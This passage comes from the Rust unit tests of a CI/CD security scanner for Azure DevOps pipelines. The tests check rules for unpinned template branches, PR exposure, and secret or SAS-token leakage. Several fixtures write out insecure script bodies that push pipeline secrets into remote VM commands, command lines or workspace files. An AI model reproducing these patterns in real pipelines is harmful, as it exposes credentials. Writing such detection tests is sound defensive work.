7707        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7708        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7709
7710        let mut sc_meta = std::collections::HashMap::new();
7711        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7712        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7713        // No META_OIDC → treated as not OIDC-federated
7714        let sc = g.add_node_with_metadata(
7715            NodeKind::Identity,
7716            "prod-azure-sc",
7717            TrustZone::FirstParty,
7718            sc_meta,
7719        );
7720        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7721        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7722
7723        let findings = service_connection_scope_mismatch(&g);
7724        assert_eq!(findings.len(), 1);
7725        assert_eq!(findings[0].severity, Severity::High);
7726        assert_eq!(
7727            findings[0].category,
7728            FindingCategory::ServiceConnectionScopeMismatch
7729        );
7730        assert!(findings[0].message.contains("prod-azure-sc"));
7731    }
7732
7733    #[test]
7734    fn service_connection_scope_mismatch_no_fire_without_pr_trigger() {
7735        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7736        // No trigger metadata
7737        let mut sc_meta = std::collections::HashMap::new();
7738        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7739        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7740        let sc = g.add_node_with_metadata(
7741            NodeKind::Identity,
7742            "prod-azure-sc",
7743            TrustZone::FirstParty,
7744            sc_meta,
7745        );
7746        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7747        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7748
7749        let findings = service_connection_scope_mismatch(&g);
7750        assert!(
7751            findings.is_empty(),
7752            "no PR trigger → service_connection_scope_mismatch must not fire"
7753        );
7754    }
7755
7756    #[test]
7757    fn checkout_self_pr_exposure_fires_on_pr_trigger() {
7758        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7759        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7760        let mut step_meta = std::collections::HashMap::new();
7761        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7762        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7763
7764        let findings = checkout_self_pr_exposure(&g);
7765        assert_eq!(findings.len(), 1);
7766        assert_eq!(
7767            findings[0].category,
7768            FindingCategory::CheckoutSelfPrExposure
7769        );
7770        assert_eq!(findings[0].severity, Severity::High);
7771    }
7772
7773    #[test]
7774    fn checkout_self_pr_exposure_no_fire_without_pr_trigger() {
7775        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7776        // No META_TRIGGER set
7777        let mut step_meta = std::collections::HashMap::new();
7778        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7779        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7780
7781        let findings = checkout_self_pr_exposure(&g);
7782        assert!(
7783            findings.is_empty(),
7784            "no PR trigger → checkout_self_pr_exposure must not fire"
7785        );
7786    }
7787
7788    #[test]
7789    fn variable_group_in_pr_job_uses_cellos_remediation() {
7790        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7791        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7792
7793        let mut secret_meta = std::collections::HashMap::new();
7794        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7795        let secret = g.add_node_with_metadata(
7796            NodeKind::Secret,
7797            "prod-secret",
7798            TrustZone::FirstParty,
7799            secret_meta,
7800        );
7801        let step = g.add_node(NodeKind::Step, "deploy step", TrustZone::Untrusted);
7802        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7803
7804        let findings = variable_group_in_pr_job(&g);
7805        assert!(!findings.is_empty());
7806        assert!(
7807            matches!(
7808                findings[0].recommendation,
7809                Recommendation::CellosRemediation { .. }
7810            ),
7811            "variable_group_in_pr_job must recommend CellosRemediation"
7812        );
7813    }
7814
7815    #[test]
7816    fn service_connection_scope_mismatch_uses_cellos_remediation() {
7817        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7818        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7819
7820        let mut id_meta = std::collections::HashMap::new();
7821        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7822        id_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7823        // No META_OIDC → treated as not OIDC-federated
7824        let identity = g.add_node_with_metadata(
7825            NodeKind::Identity,
7826            "sub-conn",
7827            TrustZone::FirstParty,
7828            id_meta,
7829        );
7830        let step = g.add_node(NodeKind::Step, "azure deploy", TrustZone::Untrusted);
7831        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7832
7833        let findings = service_connection_scope_mismatch(&g);
7834        assert!(!findings.is_empty());
7835        assert!(
7836            matches!(
7837                findings[0].recommendation,
7838                Recommendation::CellosRemediation { .. }
7839            ),
7840            "service_connection_scope_mismatch must recommend CellosRemediation"
7841        );
7842    }
7843
7844    /// Build a propagation graph with an optional approval-gated middle step:
7845    ///   Secret → middle Step (FirstParty) → Artifact → ThirdParty Step.
7846    /// When `gated` is true the middle step carries META_ENV_APPROVAL.
7847    fn build_env_approval_graph(gated: bool) -> AuthorityGraph {
7848        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7849
7850        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7851        let mut middle_meta = std::collections::HashMap::new();
7852        if gated {
7853            middle_meta.insert(META_ENV_APPROVAL.into(), "true".into());
7854        }
7855        let middle = g.add_node_with_metadata(
7856            NodeKind::Step,
7857            "deploy-prod",
7858            TrustZone::FirstParty,
7859            middle_meta,
7860        );
7861        let artifact = g.add_node(NodeKind::Artifact, "release.tar", TrustZone::FirstParty);
7862        let third = g.add_node(
7863            NodeKind::Step,
7864            "third-party/uploader",
7865            TrustZone::ThirdParty,
7866        );
7867
7868        g.add_edge(middle, secret, EdgeKind::HasAccessTo);
7869        g.add_edge(middle, artifact, EdgeKind::Produces);
7870        g.add_edge(artifact, third, EdgeKind::Consumes);
7871
7872        g
7873    }
7874
7875    #[test]
7876    fn env_approval_gate_reduces_propagation_severity() {
7877        // Baseline: no gate → Critical (third-party sink, not SHA-pinned)
7878        let baseline = authority_propagation(&build_env_approval_graph(false), 4);
7879        let baseline_finding = baseline
7880            .iter()
7881            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7882            .expect("baseline must produce an AuthorityPropagation finding");
7883        assert_eq!(baseline_finding.severity, Severity::Critical);
7884        assert!(!baseline_finding
7885            .message
7886            .contains("environment approval gate"));
7887
7888        // Gated: same shape, middle step tagged → severity drops one step to High
7889        let gated = authority_propagation(&build_env_approval_graph(true), 4);
7890        let gated_finding = gated
7891            .iter()
7892            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7893            .expect("gated must produce an AuthorityPropagation finding");
7894        assert_eq!(
7895            gated_finding.severity,
7896            Severity::High,
7897            "Critical must downgrade to High when path crosses an env-approval gate"
7898        );
7899        assert!(
7900            gated_finding
7901                .message
7902                .contains("(mitigated: environment approval gate)"),
7903            "gated finding must annotate the mitigation in its message"
7904        );
7905    }
7906
7907    #[test]
7908    fn downgrade_one_step_table() {
7909        assert_eq!(downgrade_one_step(Severity::Critical), Severity::High);
7910        assert_eq!(downgrade_one_step(Severity::High), Severity::Medium);
7911        assert_eq!(downgrade_one_step(Severity::Medium), Severity::Low);
7912        assert_eq!(downgrade_one_step(Severity::Low), Severity::Low);
7913        assert_eq!(downgrade_one_step(Severity::Info), Severity::Info);
7914    }
7915
7916    // ── template_extends_unpinned_branch ──────────────────────
7917
7918    /// Build a graph whose META_REPOSITORIES carries a single repo descriptor.
7919    /// `git_ref` of `None` encodes the "no `ref:` field" case (default branch).
7920    fn graph_with_repo(
7921        alias: &str,
7922        repo_type: &str,
7923        name: &str,
7924        git_ref: Option<&str>,
7925        used: bool,
7926    ) -> AuthorityGraph {
7927        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7928        let mut obj = serde_json::Map::new();
7929        obj.insert("alias".into(), serde_json::Value::String(alias.into()));
7930        obj.insert(
7931            "repo_type".into(),
7932            serde_json::Value::String(repo_type.into()),
7933        );
7934        obj.insert("name".into(), serde_json::Value::String(name.into()));
7935        if let Some(r) = git_ref {
7936            obj.insert("ref".into(), serde_json::Value::String(r.into()));
7937        }
7938        obj.insert("used".into(), serde_json::Value::Bool(used));
7939        let arr = serde_json::Value::Array(vec![serde_json::Value::Object(obj)]);
7940        g.metadata.insert(
7941            META_REPOSITORIES.into(),
7942            serde_json::to_string(&arr).unwrap(),
7943        );
7944        g
7945    }
7946
7947    // ── vm_remote_exec_via_pipeline_secret ──────────────
7948
7949    /// Helper: build a graph with one Step that has the given inline script
7950    /// body and (optionally) a HasAccessTo edge to a Secret named `sas_var`.
7951    fn graph_with_script_step(body: &str, secret_name: Option<&str>) -> AuthorityGraph {
7952        let mut g = AuthorityGraph::new(source("ado.yml"));
7953        let mut meta = std::collections::HashMap::new();
7954        meta.insert(META_SCRIPT_BODY.into(), body.into());
7955        let step_id =
7956            g.add_node_with_metadata(NodeKind::Step, "deploy-vm", TrustZone::FirstParty, meta);
7957        if let Some(name) = secret_name {
7958            let sec = g.add_node(NodeKind::Secret, name, TrustZone::FirstParty);
7959            g.add_edge(step_id, sec, EdgeKind::HasAccessTo);
7960        }
7961        g
7962    }
7963
7964    // ── secret_to_inline_script_env_export ────────────────────
7965
7966    /// Build a graph with one Step that has access to `secret_name` and
7967    /// stamps `script` as the META_SCRIPT_BODY.
7968    fn build_step_with_script(secret_name: &str, script: &str) -> AuthorityGraph {
7969        let mut g = AuthorityGraph::new(source("ado.yml"));
7970        let secret = g.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty);
7971        let mut meta = std::collections::HashMap::new();
7972        meta.insert(META_SCRIPT_BODY.into(), script.into());
7973        let step = g.add_node_with_metadata(NodeKind::Step, "deploy", TrustZone::FirstParty, meta);
7974        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7975        g
7976    }
7977
7978    #[test]
7979    fn template_extends_unpinned_branch_fires_on_missing_ref() {
7980        let g = graph_with_repo(
7981            "template-library",
7982            "git",
7983            "Template Library/Library",
7984            None,
7985            true,
7986        );
7987        let findings = template_extends_unpinned_branch(&g);
7988        assert_eq!(findings.len(), 1);
7989        assert_eq!(
7990            findings[0].category,
7991            FindingCategory::TemplateExtendsUnpinnedBranch
7992        );
7993        assert_eq!(findings[0].severity, Severity::High);
7994        assert!(findings[0].message.contains("default branch"));
7995    }
7996
7997    #[test]
7998    fn template_extends_unpinned_branch_fires_on_refs_heads_main() {
7999        let g = graph_with_repo(
8000            "templates",
8001            "git",
8002            "org/templates",
8003            Some("refs/heads/main"),
8004            true,
8005        );
8006        let findings = template_extends_unpinned_branch(&g);
8007        assert_eq!(findings.len(), 1);
8008        assert!(findings[0].message.contains("mutable branch 'main'"));
8009    }
8010
8011    #[test]
8012    fn template_extends_unpinned_branch_skips_tag_pinned() {
8013        let g = graph_with_repo(
8014            "templates",
8015            "github",
8016            "org/templates",
8017            Some("refs/tags/v1.0.0"),
8018            true,
8019        );
8020        let findings = template_extends_unpinned_branch(&g);
8021        assert!(
8022            findings.is_empty(),
8023            "refs/tags/v1.0.0 must be treated as pinned"
8024        );
8025    }
8026
8027    #[test]
8028    fn template_extends_unpinned_branch_skips_sha_pinned() {
8029        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8030        assert_eq!(sha.len(), 40);
8031        let g = graph_with_repo("templates", "git", "org/templates", Some(sha), true);
8032        let findings = template_extends_unpinned_branch(&g);
8033        assert!(
8034            findings.is_empty(),
8035            "40-char hex SHA must be treated as pinned"
8036        );
8037    }
8038
8039    #[test]
8040    fn template_extends_unpinned_branch_skips_unreferenced_repo_with_no_ref() {
8041        // Spec edge: "repo declared but not referenced anywhere → does not fire
8042        // (no consumer = no risk)". Applies when the declaration carries no
8043        // explicit `ref:` field — the entry is purely vestigial in that case.
8044        let g = graph_with_repo(
8045            "templates",
8046            "git",
8047            "org/templates",
8048            None,  // no explicit ref
8049            false, // and no consumer
8050        );
8051        let findings = template_extends_unpinned_branch(&g);
8052        assert!(
8053            findings.is_empty(),
8054            "repo declared with no ref and no consumer must not fire"
8055        );
8056    }
8057
8058    #[test]
8059    fn template_extends_unpinned_branch_fires_on_explicit_branch_even_without_in_file_consumer() {
8060        // An explicit `ref: refs/heads/<branch>` signals intent to consume —
8061        // the consumer is typically inside an included template file outside
8062        // the per-file scan boundary (mirrors the msigeurope corpus shape).
8063        let g = graph_with_repo(
8064            "adf_publish",
8065            "git",
8066            "org/finance-reporting",
8067            Some("refs/heads/adf_publish"),
8068            false, // no in-file consumer
8069        );
8070        let findings = template_extends_unpinned_branch(&g);
8071        assert_eq!(findings.len(), 1);
8072        assert!(findings[0].message.contains("mutable branch 'adf_publish'"));
8073    }
8074
8075    #[test]
8076    fn template_extends_unpinned_branch_skips_when_metadata_absent() {
8077        let g = AuthorityGraph::new(source("ci.yml"));
8078        assert!(template_extends_unpinned_branch(&g).is_empty());
8079    }
8080
8081    #[test]
8082    fn template_extends_unpinned_branch_handles_bare_branch_name() {
8083        // `ref: main` (no `refs/heads/` prefix) is a valid ADO shorthand for a branch.
8084        let g = graph_with_repo(
8085            "template-library",
8086            "git",
8087            "Template Library/Library",
8088            Some("main"),
8089            true,
8090        );
8091        let findings = template_extends_unpinned_branch(&g);
8092        assert_eq!(findings.len(), 1);
8093        assert!(findings[0].message.contains("mutable branch 'main'"));
8094    }
8095
8096    // ── template_repo_ref_is_feature_branch ───────────────────
8097
8098    #[test]
8099    fn template_repo_ref_is_feature_branch_fires_on_bare_feature_branch() {
8100        // Mirrors the corpus shape: `ref: feature/maps-network` (no
8101        // `refs/heads/` prefix) on the Template Library checkout.
8102        let g = graph_with_repo(
8103            "templateLibRepo",
8104            "git",
8105            "Template Library/Template Library",
8106            Some("feature/maps-network"),
8107            true,
8108        );
8109        let findings = template_repo_ref_is_feature_branch(&g);
8110        assert_eq!(findings.len(), 1);
8111        assert_eq!(
8112            findings[0].category,
8113            FindingCategory::TemplateRepoRefIsFeatureBranch
8114        );
8115        assert_eq!(findings[0].severity, Severity::High);
8116        assert!(findings[0].message.contains("feature/maps-network"));
8117        assert!(findings[0].message.contains("feature-class"));
8118    }
8119
8120    #[test]
8121    fn template_repo_ref_is_feature_branch_fires_on_refs_heads_feature() {
8122        // Same attack via the fully-qualified `refs/heads/feature/...` form.
8123        let g = graph_with_repo(
8124            "templates",
8125            "git",
8126            "org/templates",
8127            Some("refs/heads/feature/wip"),
8128            true,
8129        );
8130        let findings = template_repo_ref_is_feature_branch(&g);
8131        assert_eq!(findings.len(), 1);
8132        assert!(findings[0].message.contains("feature/wip"));
8133    }
8134
8135    #[test]
8136    fn template_repo_ref_is_feature_branch_fires_on_develop_branch() {
8137        // `develop` is not in the trunk set — it's a feature-class branch.
8138        let g = graph_with_repo(
8139            "templates",
8140            "git",
8141            "org/templates",
8142            Some("refs/heads/develop"),
8143            true,
8144        );
8145        let findings = template_repo_ref_is_feature_branch(&g);
8146        assert_eq!(findings.len(), 1);
8147    }
8148
8149    #[test]
8150    fn template_repo_ref_is_feature_branch_skips_main_branch() {
8151        // `template_extends_unpinned_branch` still fires on this — but the
8152        // feature-branch refinement does not, because main is the trunk.
8153        let g = graph_with_repo(
8154            "templates",
8155            "git",
8156            "org/templates",
8157            Some("refs/heads/main"),
8158            true,
8159        );
8160        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8161        // Sanity: the parent rule still fires on the same input.
8162        assert_eq!(template_extends_unpinned_branch(&g).len(), 1);
8163    }
8164
8165    #[test]
8166    fn template_repo_ref_is_feature_branch_skips_master_release_hotfix() {
8167        for ref_value in [
8168            "master",
8169            "refs/heads/master",
8170            "release/v1.4",
8171            "refs/heads/release/2026-q2",
8172            "releases/2026-04",
8173            "hotfix/CVE-2026-0001",
8174            "refs/heads/hotfix/CVE-2026-0002",
8175        ] {
8176            let g = graph_with_repo("t", "git", "org/t", Some(ref_value), true);
8177            assert!(
8178                template_repo_ref_is_feature_branch(&g).is_empty(),
8179                "ref {ref_value:?} must not fire as feature-class"
8180            );
8181        }
8182    }
8183
8184    #[test]
8185    fn template_repo_ref_is_feature_branch_skips_pinned_refs() {
8186        // SHA, tag, and refs/heads/<sha> are all pinned — the feature-branch
8187        // rule must not fire on any of them, regardless of the alias name.
8188        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8189        for ref_value in [
8190            sha.to_string(),
8191            "refs/tags/v1.4.2".to_string(),
8192            format!("refs/heads/{sha}"),
8193        ] {
8194            let g = graph_with_repo("templates", "git", "org/t", Some(&ref_value), true);
8195            assert!(
8196                template_repo_ref_is_feature_branch(&g).is_empty(),
8197                "pinned ref {ref_value:?} must not fire"
8198            );
8199        }
8200    }
8201
8202    #[test]
8203    fn template_repo_ref_is_feature_branch_skips_when_ref_absent() {
8204        // The "no ref:" (default-branch) case is left to
8205        // `template_extends_unpinned_branch`. The feature-branch rule only
8206        // fires on explicit feature-class refs.
8207        let g = graph_with_repo("templates", "git", "org/templates", None, true);
8208        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8209    }
8210
8211    #[test]
8212    fn template_repo_ref_is_feature_branch_cofires_with_parent_rule() {
8213        // Both rules should fire together on the corpus shape — the parent
8214        // says "not pinned", the refinement says "and it's a feature branch".
8215        let g = graph_with_repo(
8216            "templateLibRepo",
8217            "git",
8218            "Template Library/Template Library",
8219            Some("feature/maps-network"),
8220            true,
8221        );
8222        let parent = template_extends_unpinned_branch(&g);
8223        let refinement = template_repo_ref_is_feature_branch(&g);
8224        assert_eq!(parent.len(), 1, "parent rule must still fire");
8225        assert_eq!(refinement.len(), 1, "refinement must fire alongside");
8226        assert_ne!(parent[0].category, refinement[0].category);
8227    }
8228
8229    #[test]
8230    fn is_feature_class_branch_classification() {
8231        // Trunk-class — must return false.
8232        for b in [
8233            "main",
8234            "MAIN",
8235            "master",
8236            "refs/heads/main",
8237            "release/v1",
8238            "release/",
8239            "release",
8240            "releases/2026",
8241            "hotfix/x",
8242            "hotfix",
8243            "hotfixes/y",
8244            "  refs/heads/main  ",
8245        ] {
8246            assert!(!is_feature_class_branch(b), "{b:?} must be trunk");
8247        }
8248        // Feature-class — must return true.
8249        for b in [
8250            "feature/foo",
8251            "topic/bar",
8252            "dev/wip",
8253            "wip/x",
8254            "develop",
8255            "users/alice/spike",
8256            "personal-branch",
8257            "refs/heads/feature/x",
8258            "main-staging", // not exact main, prefix-only — feature-class
8259        ] {
8260            assert!(is_feature_class_branch(b), "{b:?} must be feature-class");
8261        }
8262        // Empty / whitespace.
8263        assert!(!is_feature_class_branch(""));
8264        assert!(!is_feature_class_branch("   "));
8265    }
8266
8267    #[test]
8268    fn template_extends_unpinned_branch_skips_refs_heads_with_sha() {
8269        // ADO accepts `ref: refs/heads/<sha>` to lock onto a commit on a branch.
8270        // The trailing segment is what determines mutability.
8271        let sha = "0123456789abcdef0123456789abcdef01234567";
8272        let g = graph_with_repo(
8273            "templates",
8274            "git",
8275            "org/templates",
8276            Some(&format!("refs/heads/{sha}")),
8277            true,
8278        );
8279        let findings = template_extends_unpinned_branch(&g);
8280        assert!(findings.is_empty());
8281    }
8282
8283    // ── vm_remote_exec_via_pipeline_secret ──────────────
8284
8285    #[test]
8286    fn vm_remote_exec_fires_on_set_azvmextension_with_minted_sas() {
8287        let body = r#"
8288            $sastokenpackages = New-AzStorageContainerSASToken -Container $packagecontainer -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8289            Set-AzVMExtension -ResourceGroupName $vmRG -VMName $vm.name -Name 'customScript' `
8290                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8291                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -saskey `"$sastokenpackages`"" }
8292        "#;
8293        let g = graph_with_script_step(body, None);
8294        let findings = vm_remote_exec_via_pipeline_secret(&g);
8295        assert_eq!(findings.len(), 1, "should fire once");
8296        assert_eq!(
8297            findings[0].category,
8298            FindingCategory::VmRemoteExecViaPipelineSecret
8299        );
8300        assert_eq!(findings[0].severity, Severity::High);
8301    }
8302
8303    #[test]
8304    fn vm_remote_exec_fires_on_invoke_azvmruncommand_with_pipeline_secret() {
8305        let body = r#"
8306            Invoke-AzVMRunCommand -ResourceGroupName rg -VMName vm `
8307                -CommandId RunPowerShellScript -ScriptString "Add-LocalGroupMember -Member admin -Password $(DOMAIN_JOIN_PASSWORD)"
8308        "#;
8309        let g = graph_with_script_step(body, Some("DOMAIN_JOIN_PASSWORD"));
8310        let findings = vm_remote_exec_via_pipeline_secret(&g);
8311        assert_eq!(findings.len(), 1);
8312        assert!(findings[0]
8313            .message
8314            .contains("interpolating a pipeline secret"));
8315    }
8316
8317    #[test]
8318    fn vm_remote_exec_does_not_fire_without_remote_exec_call() {
8319        // Has a SAS mint, but no VM remote-exec primitive — should not fire.
8320        let body = r#"
8321            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8322            Write-Host "sas length is $($sas.Length)"
8323        "#;
8324        let g = graph_with_script_step(body, None);
8325        let findings = vm_remote_exec_via_pipeline_secret(&g);
8326        assert!(findings.is_empty());
8327    }
8328
8329    #[test]
8330    fn vm_remote_exec_does_not_fire_when_remote_exec_has_no_secret_or_sas() {
8331        // Set-AzVMExtension with a static command line, no SAS, no secret —
8332        // should not fire (no exposed credential).
8333        let body = r#"
8334            Set-AzVMExtension -ResourceGroupName rg -VMName vm -Name diag `
8335                -Publisher Microsoft.Azure.Diagnostics -ExtensionType IaaSDiagnostics `
8336                -Settings @{ "xmlCfg" = "<wadcfg/>" }
8337        "#;
8338        let g = graph_with_script_step(body, None);
8339        let findings = vm_remote_exec_via_pipeline_secret(&g);
8340        assert!(
8341            findings.is_empty(),
8342            "no SAS-mint and no secret interpolation → no finding"
8343        );
8344    }
8345
8346    #[test]
8347    fn vm_remote_exec_fires_on_az_cli_run_command() {
8348        let body = r#"
8349            az vm run-command invoke --resource-group rg --name vm `
8350                --command-id RunShellScript --scripts "echo $(DB_PASSWORD) > /tmp/x"
8351        "#;
8352        let g = graph_with_script_step(body, Some("DB_PASSWORD"));
8353        let findings = vm_remote_exec_via_pipeline_secret(&g);
8354        assert_eq!(findings.len(), 1);
8355        assert!(findings[0].message.contains("az vm run-command"));
8356    }
8357
8358    // ── short_lived_sas_in_command_line ─────────────────
8359
8360    #[test]
8361    fn sas_in_cmdline_fires_on_minted_sas_interpolated_into_command_to_execute() {
8362        let body = r#"
8363            $sastokenpackages = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8364            $settings = @{ "commandToExecute" = "powershell install.ps1 -sas `"$sastokenpackages`"" }
8365        "#;
8366        let g = graph_with_script_step(body, None);
8367        let findings = short_lived_sas_in_command_line(&g);
8368        assert_eq!(findings.len(), 1);
8369        assert_eq!(
8370            findings[0].category,
8371            FindingCategory::ShortLivedSasInCommandLine
8372        );
8373        assert_eq!(findings[0].severity, Severity::Medium);
8374        assert!(findings[0].message.contains("sastokenpackages"));
8375    }
8376
8377    #[test]
8378    fn sas_in_cmdline_does_not_fire_when_sas_is_only_uploaded_to_blob() {
8379        // SAS minted but never put on argv — only used to build a URL.
8380        let body = r#"
8381            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8382            $url = "https://acct.blob.core.windows.net/c/?" + $sas
8383            Invoke-WebRequest -Uri $url -OutFile foo.zip
8384        "#;
8385        let g = graph_with_script_step(body, None);
8386        let findings = short_lived_sas_in_command_line(&g);
8387        assert!(findings.is_empty(), "no command-line sink → no finding");
8388    }
8389
8390    #[test]
8391    fn sas_in_cmdline_does_not_fire_without_sas_mint() {
8392        let body = r#"
8393            $settings = @{ "commandToExecute" = "powershell -File foo.ps1" }
8394        "#;
8395        let g = graph_with_script_step(body, None);
8396        let findings = short_lived_sas_in_command_line(&g);
8397        assert!(findings.is_empty());
8398    }
8399
8400    #[test]
8401    fn sas_in_cmdline_fires_on_az_cli_generate_sas_with_arguments() {
8402        let body = r#"
8403            sas=$(az storage container generate-sas --name c --account-name acct --permissions r --expiry 2099-01-01 -o tsv)
8404            az vm extension set --vm-name vm --resource-group rg --name CustomScript --publisher Microsoft.Compute \
8405                --settings "{ \"commandToExecute\": \"curl https://acct.blob.core.windows.net/c/foo?$sas\" }"
8406        "#;
8407        let g = graph_with_script_step(body, None);
8408        let findings = short_lived_sas_in_command_line(&g);
8409        // mint + sink in same script → fires (fallback evidence path).
8410        assert_eq!(findings.len(), 1);
8411    }
8412
8413    #[test]
8414    fn co_fire_on_solarwinds_pattern() {
8415        // Mirrors the corpus solarwinds shape: SAS minted, embedded in
8416        // CustomScriptExtension commandToExecute. Both rules must fire.
8417        let body = r#"
8418            $sastokenpackages = New-AzStorageContainerSASToken -Container $pc -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8419            Set-AzVMExtension -ResourceGroupName $rg -VMName $vm `
8420                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8421                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -sas `"$sastokenpackages`"" }
8422        "#;
8423        let g = graph_with_script_step(body, None);
8424        let r6 = vm_remote_exec_via_pipeline_secret(&g);
8425        let r7 = short_lived_sas_in_command_line(&g);
8426        assert_eq!(r6.len(), 1, "rule 6 must fire on solarwinds shape");
8427        assert_eq!(r7.len(), 1, "rule 7 must fire on solarwinds shape");
8428    }
8429
8430    #[test]
8431    fn body_interpolates_var_does_not_match_prefix() {
8432        // `$sas` should not match `$sastokenpackages`.
8433        assert!(!body_interpolates_var(
8434            "Write-Host $sastokenpackages",
8435            "sas"
8436        ));
8437        assert!(body_interpolates_var(
8438            "Write-Host $sastokenpackages",
8439            "sastokenpackages"
8440        ));
8441        assert!(body_interpolates_var("echo $(SECRET)", "SECRET"));
8442    }
8443
8444    #[test]
8445    fn powershell_sas_assignments_extracts_var_names() {
8446        let body = r#"
8447            $a = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r
8448            $b = Get-Date
8449            $sasBlob = New-AzStorageBlobSASToken -Container c -Blob foo -Context $ctx -Permission r
8450        "#;
8451        let names = powershell_sas_assignments(body);
8452        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("a")));
8453        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("sasBlob")));
8454        assert!(!names.iter().any(|n| n.eq_ignore_ascii_case("b")));
8455    }
8456
8457    #[test]
8458    fn bash_export_of_pipeline_secret_flagged() {
8459        let g = build_step_with_script(
8460            "TF_TOKEN",
8461            "echo init\nexport TF_TOKEN_app_terraform_io=\"$(TF_TOKEN)\"\nterraform init",
8462        );
8463        let findings = secret_to_inline_script_env_export(&g);
8464        assert_eq!(findings.len(), 1);
8465        assert_eq!(findings[0].severity, Severity::High);
8466        assert!(findings[0].message.contains("$(TF_TOKEN)"));
8467    }
8468
8469    #[test]
8470    fn powershell_assignment_of_pipeline_secret_flagged() {
8471        let g = build_step_with_script(
8472            "AppContainerDBPassword",
8473            "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n$x = 1",
8474        );
8475        let findings = secret_to_inline_script_env_export(&g);
8476        assert_eq!(findings.len(), 1);
8477        assert!(findings[0].message.contains("$(AppContainerDBPassword)"));
8478    }
8479
8480    #[test]
8481    fn secret_passed_as_command_argument_not_flagged() {
8482        // Secret used as a CLI argument, not assigned to a variable. This is
8483        // covered by the separate META_CLI_FLAG_EXPOSED detection — env_export
8484        // should NOT also fire here.
8485        let g = build_step_with_script("TF_TOKEN", "terraform plan -var \"token=$(TF_TOKEN)\"");
8486        let findings = secret_to_inline_script_env_export(&g);
8487        assert!(
8488            findings.is_empty(),
8489            "command-arg use of $(SECRET) must not trip env-export rule"
8490        );
8491    }
8492
8493    #[test]
8494    fn step_without_script_body_not_flagged() {
8495        let mut g = AuthorityGraph::new(source("ado.yml"));
8496        let secret = g.add_node(NodeKind::Secret, "TF_TOKEN", TrustZone::FirstParty);
8497        let step = g.add_node(NodeKind::Step, "task", TrustZone::FirstParty);
8498        g.add_edge(step, secret, EdgeKind::HasAccessTo);
8499        let findings = secret_to_inline_script_env_export(&g);
8500        assert!(findings.is_empty());
8501    }
8502
8503    // ── secret_materialised_to_workspace_file ────────────────
8504
8505    #[test]
8506    fn powershell_outfile_of_secret_to_workspace_flagged() {
8507        // Mirrors Azure_Landing_Zone/userapp-n8nx pattern: secret bound to
8508        // $var, then $var written via Out-File to $(System.DefaultWorkingDirectory).
8509        let script = "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n\
8510                      $TFfile = Get-Content $(System.DefaultWorkingDirectory)/in.tfvars\n\
8511                      $TFfile = $TFfile.Replace(\"x\", $AppContainerDBPassword)\n\
8512                      $TFfile | Out-File $(System.DefaultWorkingDirectory)/envVars/tffile.tfvars";
8513        let g = build_step_with_script("AppContainerDBPassword", script);
8514        let findings = secret_materialised_to_workspace_file(&g);
8515        assert_eq!(
8516            findings.len(),
8517            1,
8518            "Out-File of bound secret to workspace must fire"
8519        );
8520        assert_eq!(findings[0].severity, Severity::High);
8521    }
8522
8523    #[test]
8524    fn bash_redirect_of_secret_to_tfvars_flagged() {
8525        let script =
8526            "echo \"token = \\\"$(TF_TOKEN)\\\"\" > $(Build.SourcesDirectory)/secrets.tfvars";
8527        let g = build_step_with_script("TF_TOKEN", script);
